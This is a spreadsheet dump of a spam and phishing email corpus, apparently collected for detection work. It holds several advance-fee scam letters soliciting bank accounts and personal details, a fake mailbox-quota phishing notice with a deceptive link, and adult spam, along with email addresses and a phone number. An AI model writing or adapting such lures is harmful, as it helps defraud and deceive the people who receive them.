    <t>Block 20,Flat 2,1004 Estate\nVictoria Island Lagos\n\n                         CONFIDENTIAL\n\nDear Sir\n\n\n\nIt's my pleasure to send you this mail which I hope you will treat as highly\nconfidential. I am Mr.JERRY PETER ,A 53 years old man and the Deputy\nTreasury\nOfficer with the Central Bank of Nigeria lagos.During the Military regime\nof Late General Sani Abacha, contracts runing into several millions of\ndollars\nwere awarded to friends and cronies fronting for the late despotic ruler,but\nunfortunately before such payments could go\nthrough, he died mysteriously in power.\n\nI am writing you for assistance in transfering the sum of US$36.8 million\ndollars into your account.This amount represents just a payment due to one\nof his friends for a contract awarded to him but was not actually\nexecuted,he is afraid to come forward to claim the money for fear of being\nprosecuted.\n\nThis money is lying dormant in the vaults of the Central Bank of Nigeria\nand I use this opportunity to crave your indulgience in transfering this\nmoney intoyour account, this business is totally risk free,it is only\nmyself that is aware of this floating money.For your assistance,I am\nwilling to give you 30% of the total sum,while you will assist me in\ninvesting my share in viable businesses in your country pending when I\neventually resign my appointment and join you.Please if you know you can\nassist me,endeavour to get in touch with me as soon as possible so i can\ngive you the necessary details so as to conclude the transfer within 7\nworking\ndays.\n\n\n\nRegards,\n\n\nMr.JERRY PETER\n\n\n\n\n\n\n----------------------------------------------------------------\nCe service de mailing vous est offert par [URL]http://www.freesurf.fr[/URL]\nFreeSurf, votre acces ADSL a partir de 29 euros/mois\n[URL]http://www.freesurf.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.freesurf.fr http://www.freesurf.fr</t>
  </si>
  <si>
    <t>327</t>
  </si>
  <si>
    <t>To: mnoah12@hotmail.com\nFrom: mona noah &lt;mnoah3@hotmail.com&gt;\nDate: Wed, 27 Aug 2003 12:55:45 +0000</t>
  </si>
  <si>
    <t>Wed, 27 Aug 2003 12:55:45 +0000</t>
  </si>
  <si>
    <t>mona noah &lt;mnoah3@hotmail.com&gt;</t>
  </si>
  <si>
    <t>mnoah12@hotmail.com</t>
  </si>
  <si>
    <t>urgent business transaction!!</t>
  </si>
  <si>
    <t>Dear sir,\n\nI am pleased to introduce a business opportunity to you,to transfer to your \noverseas account,sum of,(US$10.500.000m)Ten million five hundred thousands \nUnited States Dollars) from one of the Prime Banks here in Dakar-Senegal,I \nurgently want to know soonest you,If you are not capable to handle and \nacomodate this magnitude of funds untill i resign and come over to join for \nan investment in your country,tell me so that i can quietly look for another \nreliable and honest individual/organisation that would be capable and fit \nenough to provide either an existing bank account\nor to set up a new Bank a/c immediately to receive this funds,even an empty \na/c can serve to receive\nthis funds,as long as you will remain honest to me till we actualise this \ninterest,believing that you will never let me down either now or in future.\n\nI am Mr Mona Noah the Auditor General of one of the prime banks here in \nDakar Senegal west Africa during the course of our auditing,I discovered a \nfloating fund in an account opened in the our bank\nsince 1982 and till date no body has operated on this account again,after \ngoing through some old files in the records I discovered that the owner of \nthe account died long ago in a plane crash along with his\nfamily without leaving a[Heir/WILL] hence the funds is floating and if I do \nnot remit this money out urgently it will be forfeited for nothing.The owner \nof this account is Khalifa T.Ibrahim a foreigner\nbefore his death,he was a management consultant and he died since 1992.No \nother person knows about this account or any thing concerning it, the \naccount has no other beneficiary and my investigation proved to me as well \nthat until his sudden death he was a management consultant.\n\nSince I hardly know any foreigner,I am only contacting you as a foreigner \npartner to stand and apply as his next of kin because this money can not be \napproved to a local person here as his next of kin,without valid \ninternational foreign passport,but can only be approved to any foreigner \nwith valid international passport or drivers license and foreign a/c because \nthe money is in US dollars and the former owner of the a/c is a foreigner \ntoo,and the money can only be approved into a foreign a/c.\n\nI need your full co-operation to make this work fine because the management \nis ready to approve this payment to any foreigner who has correct \ninformation of this account,which I will give to you upon your positive \nresponse and once I am convinced that you are capable and will meet up with \ninstruction of a key bank official who is deeply involved with me in this \nbusiness.I need your strong assurance that\nyou will never,never let me down.\n\nWith my influence and my position in the bank the bank official can transfer \nthis money to any foreigner's reliable account that you can provide with \nassurance that this money will be intact pending on my physical arrival in \nyour country for sharing. The bank official Will destroy all documents of \ntransaction immediately we receive this money leaving no trace to any place \nand to build confidence you\ncan call me for heart to heart discussion through my private satellite phone \nwhich I secured for the security and safety of this business as you know \nthat this business is confidential.\n\nAt the conclusion of this business,you will be given 35% of the total \namount,60% will be for me, while 5% will be for expenses both parties might \nhave incurred during the process of transferring.\n\nI look forward to your earliest reply through my email address.\nyou can contact me with:   mnoah12@hotmail.com\nYours truly,\n\nMr Mona Noah.\n\n_________________________________________________________________\nAdd photos to your messages with MSN 8. Get 2 months FREE*. \n[URL]http://join.msn.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://join.msn.com</t>
  </si>
  <si>
    <t>218</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Mail Administrator"&lt;mobile@mdl.net&gt;\nDate: Wed, 27 Apr 2016 09:09:28 +0100</t>
  </si>
  <si>
    <t>Wed, 27 Apr 2016 09:09:28 +0100</t>
  </si>
  <si>
    <t>"Mail Administrator"&lt;mobile@mdl.net&gt;</t>
  </si>
  <si>
    <t>Your email jose@monkey.org will soon be shutdown</t>
  </si>
  <si>
    <t>Server Alert        	         E-mail Subject:   	      Your mailbox (jose@monkey.org ) will be closed today!     E-mail Message:  	       We noticed that you are almost out of the mailbox quota  Soon you will no longer be able to receive or send new messages.  Now, you need to upgrade your mail quota to 15GB free  Click the link below to get your free 15GB:  [URL]http://jose@monkey.org[/URL] =upgrade?var=15GB  Your mailbox will be closed today, if you do not upgrade to 15GB      Senders:   	      Mailbox Information Center      Server Alert      E-mail Subject:    Your mailbox (jose@monkey.org ) will be closed today!  E-mail Message:  We noticed that you are almost out of the mailbox quota  Soon you will no longer be able to receive or send new messages.  Now, you need to upgrade your mail quota to 15GB free  Click the link below to get your free 15GB:  [URL]http://jose@monkey.org[/URL] =upgrade?var=15GB  Your mailbox will be closed today, if you do not upgrade to 15GB     Senders:    Mailbox Information Center</t>
  </si>
  <si>
    <t>4688</t>
  </si>
  <si>
    <t>To: yyyy@netcomuk.co.uk\nFrom: beth432114@yahoo.com\nDate: Wed, 26 Sep 2001 01:00:10 -0500</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 01:00:10 -0500</t>
  </si>
  <si>
    <t>beth432114@yahoo.com</t>
  </si>
  <si>
    <t>yyyy@netcomuk.co.uk</t>
  </si>
  <si>
    <t>xxx site passwords 432114108765443333222222</t>
  </si>
  <si>
    <t>STOP    PAYING FOR PORN You will    be amazed how easy it is!!!!  GETTING    FREE XXX PASSWORDS IS EASY,   WE'LL SHOW YOU HOW!!! CLICK    HERE    TO GET YOUR FREE PASSWORDS                 Removal Instructions: You have received this advertisement because you have opted in to receive free adult internet offers and specials through our affiliated websites. If you do not wish to receive further emails or have received the email in error you may opt-out of our database here:  [URL]http://157.237.128.20[/URL] . Please allow 24hours for removal. This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.   432114108765443333222222</t>
  </si>
  <si>
    <t>http://157.237.128.20</t>
  </si>
  <si>
    <t>2376</t>
  </si>
  <si>
    <t>To: josephtaylor_southafrica55@hotmail.com\nFrom: joseph taylor &lt;josephtaylor_southafrica55@hotmail.com&gt;\nDate: Wed, 26 Jul 2006 16:50:42 +0200</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2006 16:50:42 +0200</t>
  </si>
  <si>
    <t>joseph taylor &lt;josephtaylor_southafrica55@hotmail.com&gt;</t>
  </si>
  <si>
    <t>josephtaylor_southafrica55@hotmail.com</t>
  </si>
  <si>
    <t>FROM MR. JOSEPH TAYLOR  (PLS CALL ME AS SOON AS YOU GET THIS MAIL)</t>
  </si>
  <si>
    <t xml:space="preserve">                                       VERY CONFIDENTIAL MATTER.\n\nDEAR BELOVED,\n\n\nPLEASE CONSIDER THIS MAIL AS VERY IMPORTANT AND URGENT. I AM MR. JOSEPH \nTAYLOR, THE ELDEST SON OF   FORMER PRESIDENT OF LIBERIA- PRESIDENT CHARLES \nTAYLOR. MY FATHER IS NOW IN HAGUE, NETHERLANDS FACING TRIALS WITH THE UNITED \nNATIONS COURT SITTING THERE.\n\nBEFORE HE WAS FORCED TO FACE HIS TRIAL IN NETHERLANDS, HE HANDED ME THE SUM \nOF US$10M (TEN MILLION UNITED STATES DOLLARS) CASH FOR SAFE KEEPING BECAUSE \nHE ALREADY KNEW THAT USA GOVERNMENT AND THE UNITED NATIONS ARE AFTER HIM. HE \nADVISED THAT I SHOULD USE THIS MONEY WISELY FOR INVESTMENT BECAUSE HE IS \nAWARE THAT HE MIGHT BE JAILED.\n\nI AM NOW INTO HIDING IN SOUTH AFRICA WITH THIS MONEY BUT MY PROBLEM RIGHT \nNOW IS THAT I DON'T WANT THE AUTHORITIES HERE TO KNOW ABOUT THIS MONEY OR MY \nWHEREABOUT   FOR SECURITY REASONS. I WANT YOU TO ASSIST ME MOVE THIS MONEY \nOUT AND INVEST IT IN YOUR COUNTRY. I WILL USE FAKE IDENTITY TO MOVE OUT OF \nSOUTH AFRICA BUT I WANT YOU TO ASSIST ME IN RECEIVING THIS MONEY SO THAT WE \nCAN INVEST IT TOGETHER IN YOUR COUNTRY HENCE I DON'T WANT TO LOSE THE MONEY \nHERE. THE MONEY IS NOW DEPOSITED IN A SECURITY COMPANY UNDER THE DISGUISE OF \nFAMILY TREASURY TO AVOID THE MANAGEMENT TAMPERING WITH IT.\n\nPLEASE LET ME KNOW IF YOU CAN ASSIST ME INVEST THE MONEY IN YOUR COUNTRY AND \nEVERYTHING WILL BE UNDER YOUR NAME TO AVOID THE GOVERNMENT KNOWING THAT I AM \nTHE OWNER OF THIS MONEY AND THE INVESTMENT. EVERYTHING SHOULD BE BASED ON \nTRUST AND YOU MUST NOT LEAK THIS INFORMATION TO ANYBODY TO AVOID THE \nAUTHORITIES ARRESTING ME OR CONFISCATING THE MONEY HERE.\n\nWE WILL DISCUSS FACE TO FACE ABOUT YOUR COMPENSATION FOR ASSISTING ME OR WE \nCAN GO INTO BUSINESS PARTNERSHIP TOGETHER. I AM WAITING FOR YOUR URGENT \nREPLY AND YOU CAN CALL ME ON MY PRIVATE NUMBER: +27 83 999 5081. PLS DO NOT \nRELEASE MY PHONE NUMBER OR MY IDENTITY TO ANYBODY FOR MY SAFETY HERE.\n\nAWAITING YOUR URGENT COOPERATION.\n\nREGARDS,\n\nJOSEPH TAYLOR.\n\nNOTE:  PLS REPLY THROUGH MY SAFE YAHOO EMAIL ADDRESS:  \njosephtaylor_southafrica@yahoo.com                                           \n         VERY CONFIDENTIAL MATTER.\n\nDEAR BELOVED,\n\n\nPLEASE CONSIDER THIS MAIL AS VERY IMPORTANT AND URGENT. I AM MR. JOSEPH \nTAYLOR, THE ELDEST SON OF   FORMER PRESIDENT OF LIBERIA- PRESIDENT CHARLES \nTAYLOR. MY FATHER IS NOW IN HAGUE, NETHERLANDS FACING TRIALS WITH THE UNITED \nNATIONS COURT SITTING THERE.\n\nBEFORE HE WAS FORCED TO FACE HIS TRIAL IN NETHERLANDS, HE HANDED ME THE SUM \nOF US$10M (TEN MILLION UNITED STATES DOLLARS) CASH FOR SAFE KEEPING BECAUSE \nHE ALREADY KNEW THAT USA GOVERNMENT AND THE UNITED NATIONS ARE AFTER HIM. HE \nADVISED THAT I SHOULD USE THIS MONEY WISELY FOR INVESTMENT BECAUSE HE IS \nAWARE THAT HE MIGHT BE JAILED.\n\nI AM NOW INTO HIDING IN SOUTH AFRICA WITH THIS MONEY BUT MY PROBLEM RIGHT \nNOW IS THAT I DON'T WANT THE AUTHORITIES HERE TO KNOW ABOUT THIS MONEY OR MY \nWHEREABOUT   FOR SECURITY REASONS. I WANT YOU TO ASSIST ME MOVE THIS MONEY \nOUT AND INVEST IT IN YOUR COUNTRY. I WILL USE FAKE IDENTITY TO MOVE OUT OF \nSOUTH AFRICA BUT I WANT YOU TO ASSIST ME IN RECEIVING THIS MONEY SO THAT WE \nCAN INVEST IT TOGETHER IN YOUR COUNTRY HENCE I DON'T WANT TO LOSE THE MONEY \nHERE. THE MONEY IS NOW DEPOSITED IN A SECURITY COMPANY UNDER THE DISGUISE OF \nFAMILY TREASURY TO AVOID THE MANAGEMENT TAMPERING WITH IT.\n\nPLEASE LET ME KNOW IF YOU CAN ASSIST ME INVEST THE MONEY IN YOUR COUNTRY AND \nEVERYTHING WILL BE UNDER YOUR NAME TO AVOID THE GOVERNMENT KNOWING THAT I AM \nTHE OWNER OF THIS MONEY AND THE INVESTMENT. EVERYTHING SHOULD BE BASED ON \nTRUST AND YOU MUST NOT LEAK THIS INFORMATION TO ANYBODY TO AVOID THE \nAUTHORITIES ARRESTING ME OR CONFISCATING THE MONEY HERE.\n\nWE WILL DISCUSS FACE TO FACE ABOUT YOUR COMPENSATION FOR ASSISTING ME OR WE \nCAN GO INTO BUSINESS PARTNERSHIP TOGETHER. I AM WAITING FOR YOUR URGENT \nREPLY AND YOU CAN CALL ME ON MY PRIVATE NUMBER: +27 83 999 5081. PLS DO NOT \nRELEASE MY PHONE NUMBER OR MY IDENTITY TO ANYBODY FOR MY SAFETY HERE.\n\nAWAITING YOUR URGENT COOPERATION.\n\nREGARDS,\n\nJOSEPH TAYLOR.\n\nNOTE:  PLS REPLY THROUGH MY SAFE YAHOO EMAIL ADDRESS:  \njosephtaylor_southafrica@yahoo.com                                           \n         VERY CONFIDENTIAL MATTER.\n\nDEAR BELOVED,\n\n\nPLEASE CONSIDER THIS MAIL AS VERY IMPORTANT AND URGENT. I AM MR. JOSEPH \nTAYLOR, THE ELDEST SON OF   FORMER PRESIDENT OF LIBERIA- PRESIDENT CHARLES \nTAYLOR. MY FATHER IS NOW IN HAGUE, NETHERLANDS FACING TRIALS WITH THE UNITED \nNATIONS COURT SITTING THERE.\n\nBEFORE HE WAS FORCED TO FACE HIS TRIAL IN NETHERLANDS, HE HANDED ME THE SUM \nOF US$10M (TEN MILLION UNITED STATES DOLLARS) CASH FOR SAFE KEEPING BECAUSE \nHE ALREADY KNEW THAT USA GOVERNMENT AND THE UNITED NATIONS ARE AFTER HIM. HE \nADVISED THAT I SHOULD USE THIS MONEY WISELY FOR INVESTMENT BECAUSE HE IS \nAWARE THAT HE MIGHT BE JAILED.\n\nI AM NOW INTO HIDING IN SOUTH AFRICA WITH THIS MONEY BUT MY PROBLEM RIGHT \nNOW IS THAT I DON'T WANT THE AUTHORITIES HERE TO KNOW ABOUT THIS MONEY OR MY \nWHEREABOUT   FOR SECURITY REASONS. I WANT YOU TO ASSIST ME MOVE THIS MONEY \nOUT AND INVEST IT IN YOUR COUNTRY. I WILL USE FAKE IDENTITY TO MOVE OUT OF \nSOUTH AFRICA BUT I WANT YOU TO ASSIST ME IN RECEIVING THIS MONEY SO THAT WE \nCAN INVEST IT TOGETHER IN YOUR COUNTRY HENCE I DON'T WANT TO LOSE THE MONEY \nHERE. THE MONEY IS NOW DEPOSITED IN A SECURITY COMPANY UNDER THE DISGUISE OF \nFAMILY TREASURY TO AVOID THE MANAGEMENT TAMPERING WITH IT.\n\nPLEASE LET ME KNOW IF YOU CAN ASSIST ME INVEST THE MONEY IN YOUR COUNTRY AND \nEVERYTHING WILL BE UNDER YOUR NAME TO AVOID THE GOVERNMENT KNOWING THAT I AM \nTHE OWNER OF THIS MONEY AND THE INVESTMENT. EVERYTHING SHOULD BE BASED ON \nTRUST AND YOU MUST NOT LEAK THIS INFORMATION TO ANYBODY TO AVOID THE \nAUTHORITIES ARRESTING ME OR CONFISCATING THE MONEY HERE.\n\nWE WILL DISCUSS FACE TO FACE ABOUT YOUR COMPENSATION FOR ASSISTING ME OR WE \nCAN GO INTO BUSINESS PARTNERSHIP TOGETHER. I AM WAITING FOR YOUR URGENT \nREPLY AND YOU CAN CALL ME ON MY PRIVATE NUMBER: +27 83 999 5081. PLS DO NOT \nRELEASE MY PHONE NUMBER OR MY IDENTITY TO ANYBODY FOR MY SAFETY HERE.\n\nAWAITING YOUR URGENT COOPERATION.\n\nREGARDS,\n\nJOSEPH TAYLOR.\n\nNOTE:  PLS REPLY THROUGH MY SAFE YAHOO EMAIL ADDRESS:  \njosephtaylor_southafrica@yahoo.com                                           \n         VERY CONFIDENTIAL MATTER.\n\nDEAR BELOVED,\n\n\nPLEASE CONSIDER THIS MAIL AS VERY IMPORTANT AND URGENT. I AM MR. JOSEPH \nTAYLOR, THE ELDEST SON OF   FORMER PRESIDENT OF LIBERIA- PRESIDENT CHARLES \nTAYLOR. MY FATHER IS NOW IN HAGUE, NETHERLANDS FACING TRIALS WITH THE UNITED \nNATIONS COURT SITTING THERE.\n\nBEFORE HE WAS FORCED TO FACE HIS TRIAL IN NETHERLANDS, HE HANDED ME THE SUM \nOF US$10M (TEN MILLION UNITED STATES DOLLARS) CASH FOR SAFE KEEPING BECAUSE \nHE ALREADY KNEW THAT USA GOVERNMENT AND THE UNITED NATIONS ARE AFTER HIM. HE \nADVISED THAT I SHOULD USE THIS MONEY WISELY FOR INVESTMENT BECAUSE HE IS \nAWARE THAT HE MIGHT BE JAILED.\n\nI AM NOW INTO HIDING IN SOUTH AFRICA WITH THIS MONEY BUT MY PROBLEM RIGHT \nNOW IS THAT I DON'T WANT THE AUTHORITIES HERE TO KNOW ABOUT THIS MONEY OR MY \nWHEREABOUT   FOR SECURITY REASONS. I WANT YOU TO ASSIST ME MOVE THIS MONEY \nOUT AND INVEST IT IN YOUR COUNTRY. I WILL USE FAKE IDENTITY TO MOVE OUT OF \nSOUTH AFRICA BUT I WANT YOU TO ASSIST ME IN RECEIVING THIS MONEY SO THAT WE \nCAN INVEST IT TOGETHER IN YOUR COUNTRY HENCE I DON'T WANT TO LOSE THE MONEY \nHERE. THE MONEY IS NOW DEPOSITED IN A SECURITY COMPANY UNDER THE DISGUISE OF \nFAMILY TREASURY TO AVOID THE MANAGEMENT TAMPERING WITH IT.\n\nPLEASE LET ME KNOW IF YOU CAN ASSIST ME INVEST THE MONEY IN YOUR COUNTRY AND \nEVERYTHING WILL BE UNDER YOUR NAME TO AVOID THE GOVERNMENT KNOWING THAT I AM \nTHE OWNER OF THIS MONEY AND THE INVESTMENT. EVERYTHING SHOULD BE BASED ON \nTRUST AND YOU MUST NOT LEAK THIS INFORMATION TO ANYBODY TO AVOID THE \nAUTHORITIES ARRESTING ME OR CONFISCATING THE MONEY HERE.\n\nWE WILL DISCUSS FACE TO FACE ABOUT YOUR COMPENSATION FOR ASSISTING ME OR WE \nCAN GO INTO BUSINESS PARTNERSHIP TOGETHER. I AM WAITING FOR YOUR URGENT \nREPLY AND YOU CAN CALL ME ON MY PRIVATE NUMBER: +27 83 999 5081. PLS DO NOT \nRELEASE MY PHONE NUMBER OR MY IDENTITY TO ANYBODY FOR MY SAFETY HERE.\n\nAWAITING YOUR URGENT COOPERATION.\n\nREGARDS,\n\nJOSEPH TAYLOR.\n\nNOTE:  PLS REPLY THROUGH MY SAFE YAHOO EMAIL ADDRESS:  \njosephtaylor_southafrica@yahoo.com                                           \n         VERY CONFIDENTIAL MATTER.\n\nDEAR BELOVED,\n\n\nPLEASE CONSIDER THIS MAIL AS VERY IMPORTANT AND URGENT. I AM MR. JOSEPH \nTAYLOR, THE ELDEST SON OF   FORMER PRESIDENT OF LIBERIA- PRESIDENT CHARLES \nTAYLOR. MY FATHER IS NOW IN HAGUE, NETHERLANDS FACING TRIALS WITH THE UNITED \nNATIONS COURT SITTING THERE.\n\nBEFORE HE WAS FORCED TO FACE HIS TRIAL IN NETHERLANDS, HE HANDED ME THE SUM \nOF US$10M (TEN MILLION UNITED STATES DOLLARS) CASH FOR SAFE KEEPING BECAUSE \nHE ALREADY KNEW THAT USA GOVERNMENT AND THE UNITED NATIONS ARE AFTER HIM. HE \nADVISED THAT I SHOULD USE THIS MONEY WISELY FOR INVESTMENT BECAUSE HE IS \nAWARE THAT HE MIGHT BE JAILED.\n\nI AM NOW INTO HIDING IN SOUTH AFRICA WITH THIS MONEY BUT MY PROBLEM RIGHT \nNOW IS THAT I DON'T WANT THE AUTHORITIES HERE TO KNOW ABOUT THIS MONEY OR MY \nWHEREABOUT   FOR SECURITY REASONS. I WANT YOU TO ASSIST ME MOVE THIS MONEY \nOUT AND INVEST IT IN YOUR COUNTRY. I WILL USE FAKE IDENTITY TO MOVE OUT OF \nSOUTH AFRICA BUT I WANT YOU TO ASSIST ME IN RECEIVING THIS MONEY SO THAT WE \nCAN INVEST IT TOGETHER IN YOUR COUNTRY HENCE I DON'T WANT TO LOSE THE MONEY \nHERE. THE MONEY IS NOW DEPOSITED IN A SECURITY COMPANY UNDER THE DISGUISE OF \nFAMILY TREASURY TO AVOID THE MANAGEMENT TAMPERING WITH IT.\n\nPLEASE LET ME KNOW IF YOU CAN ASSIST ME INVEST THE MONEY IN YOUR COUNTRY AND \nEVERYTHING WILL BE UNDER YOUR NAME TO AVOID THE GOVERNMENT KNOWING THAT I AM \nTHE OWNER OF THIS MONEY AND THE INVESTMENT. EVERYTHING SHOULD BE BASED ON \nTRUST AND YOU MUST NOT LEAK THIS INFORMATION TO ANYBODY TO AVOID THE \nAUTHORITIES ARRESTING ME OR CONFISCATING THE MONEY HERE.\n\nWE WILL DISCUSS FACE TO FACE ABOUT YOUR COMPENSATION FOR ASSISTING ME OR WE \nCAN GO INTO BUSINESS PARTNERSHIP TOGETHER. I AM WAITING FOR YOUR URGENT \nREPLY AND YOU CAN CALL ME ON MY PRIVATE NUMBER: +27 83 999 5081. PLS DO NOT \nRELEASE MY PHONE NUMBER OR MY IDENTITY TO ANYBODY FOR MY SAFETY HERE.\n\nAWAITING YOUR URGENT COOPERATION.\n\nREGARDS,\n\nJOSEPH TAYLOR.\n\nNOTE:  PLS REPLY THROUGH MY SAFE YAHOO EMAIL ADDRESS:  \njosephtaylor_southafrica@yahoo.com\n\n_________________________________________________________________\nCustomise your home page with RSS feeds - visit MSN SA today! \n[URL]http://za.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://za.msn.com</t>
  </si>
  <si>
    <t>2373</t>
  </si>
  <si>
    <t>To: musagaruba2005@latinmail.com &lt;musagaruba2005@latinmail.com&gt;\nFrom: Musa Garuba &lt;musagaruba2005@latinmail.com&gt;\nDate: Wed, 26 Jul 2006 02:51:58 +0200</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2006 02:51:58 +0200</t>
  </si>
  <si>
    <t>Musa Garuba &lt;musagaruba2005@latinmail.com&gt;</t>
  </si>
  <si>
    <t>musagaruba2005@latinmail.com &lt;musagaruba2005@latinmail.com&gt;</t>
  </si>
  <si>
    <t>(FROM THE DESK OF MUSA GARUBA)</t>
  </si>
  <si>
    <t>FROM THE DESK OF MUSA GARUBA\nBILL AND EXCHANGE MANAGER \nAFRICAN DEVELOPMENT BANK \nOUAGADOUGOU, BURKINA FASO \n\n\nI AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF AFRICAN DEVELOPMENT BANK BURKINA FASO. I GOT YOUR CONTACT ADDRESS THROUGH INTERNET NET WORK SEARCH WHEN SEARCHING FOR A GOOD AND RELIABLE PERSON THAT WILL ASSIST ME IN THIS TRANSACTION. \n\nIN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF 22.85M US DOLLARS ( TWENTY TWO MILLLION EIGHT HUNDRED AND FIFTY THOUSAND US DOLLARS)IN AN ACCOUNT THATBELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ON 25TH JULY 2001 IN SUPER SONIC CONCORDE PLANE CRASH AT CHARLES DE GAULLE AIRPORT IN PARIS FRANCE \nALONG WITH HIS ENTIRE FAMILY. \n\nSINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT UNLESS SOMEBODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES BUT UNFORTUNATELY WE LEARNT THAT ALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM. IT IS THEREFORE UPON THIS DISCOVERY THAT I DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL. \n\nTHE BANKING LAW AND GUIDELINE HERE STIPULATES THAT IF SUCH MONEY REMAINED UNCLAMED AFTER FOUR YEAR, THE MONEY WILL BE TRANSFERED INTO THE BANK TREASURY AS UNCLAIMED FUND. \n\nTHE REQUEST OF FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASIONED BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE CANNOT STAND AS NEXT OF KIN TO A FOREIGNER. \n\nI AGREE THAT 30% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER, IN RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT AND 70% WOULD BE FOR ME; \n\nTHEREFORE TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATIONS OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN \nTHE MONEY WILL BE REMITTED. \n\nUPON RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF THE APPLICATION. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS TRANSACTION IS HITCH FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER. \n\nYOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS MAIL THROUGH MY PRIVATE LINE. YOUR'S FAITHFULLY \nMR. MUSA GARUBA.\nBILL AND EXCHANGE MANAGER \nAFRICAN DEVELOPMENT BANK \nOUAGADOUGOU,BURKINA FASO\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.latinchat.com</t>
  </si>
  <si>
    <t>2374</t>
  </si>
  <si>
    <t>To: nan\nFrom: nasco haza &lt;nasco_haza2@hotmail.com&gt;\nDate: Wed, 26 Jul 2006 02:01:37 +0000</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2006 02:01:37 +0000</t>
  </si>
  <si>
    <t>nasco haza &lt;nasco_haza2@hotmail.com&gt;</t>
  </si>
  <si>
    <t>I NEED YOUR CO-OPERATION.</t>
  </si>
  <si>
    <t>FOR YOUR KIND ATTENTION.\nKINDLY CONSIDER THIS OFFER AND GET BACK TO ME AS SOON AS POSIBLE.\nI AM A HOUSE BOY TO MR.SCHRANNER WHO DIED IN A JET CRASH IN THE YEAR \n2000.THE GERMAN NATIONAL IS RUNNING AN ESTATE/PROPERTY BUSINESS HERE IN \nBURKINA FASO.\n\nHE DEPOSITED THE SUM OF 10.5 MILLION DOLLARS WITH A SECURITY COMPANY HERE IN \nBURKINA FASO.THIS AMOUNT WILL BE EXCHANGED FOR GOLD DUST IF HE SO WISHED.I \nWANT YOU TO FORWARD TO ME YOUR NAME;YOUR AGE;OCCUPATION;YOUR ADDRESS;YOUR \nTELEPHONE NUMBER AND YOUR PRIVATE E-MAIL ADDRESS.I WILL INTRODUCE YOUR NAME \nTO THE COMPANY DIRECTOR OF THE COMPANY WHERE HE DEPOSITED THE FUNDS AS HIS \nFOREIGN PARTNER AND INVESTOR ABROAD.YOU WILL CONTACT THE COMPANY WITH THE \nINFORMATION THAT I WILL GIVE TO YOU FOR THE COMPANY TO RELEASE AND RELOCATE \nTHE FUNDS OR GOLD DUST TO YOU IN YOUR DESTINATION.\n\nYOU WILL INVITE ME AND GIVE ME A PERCENTAGE OF THE MONEY FOR ME TO START MY \nOWN LIFE.MY MASTER DIED ALONG SIDE WITH HIS WIFE AND THE ONLY CHILD TOGETHER \nWITH THE ONLY SON INLAW.GET BACK TO ME FOR MORE DETAILS.ALL INFORMATION \nCONCERNING THIS DEPOSIT IS WITH ME.I WILL GUIDE YOU THROUGH.\n\nBEST REGARDS.\nBULA.\n\n_________________________________________________________________\nMSN Hotmail : crez votre adresse e-mail gratuite &amp;  vie ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1096</t>
  </si>
  <si>
    <t>To: rbyrd@jacksonemc.com\nFrom: Mr. Tom Adams &lt;adams_01@yalla.com.lb&gt;\nDate: Wed, 26 Jan 2005 02:20:59 +0100</t>
  </si>
  <si>
    <t>Wed, 26 Jan 2005 02:20:59 +0100</t>
  </si>
  <si>
    <t>Mr. Tom Adams &lt;adams_01@yalla.com.lb&gt;</t>
  </si>
  <si>
    <t>rbyrd@jacksonemc.com</t>
  </si>
  <si>
    <t>Your attention</t>
  </si>
  <si>
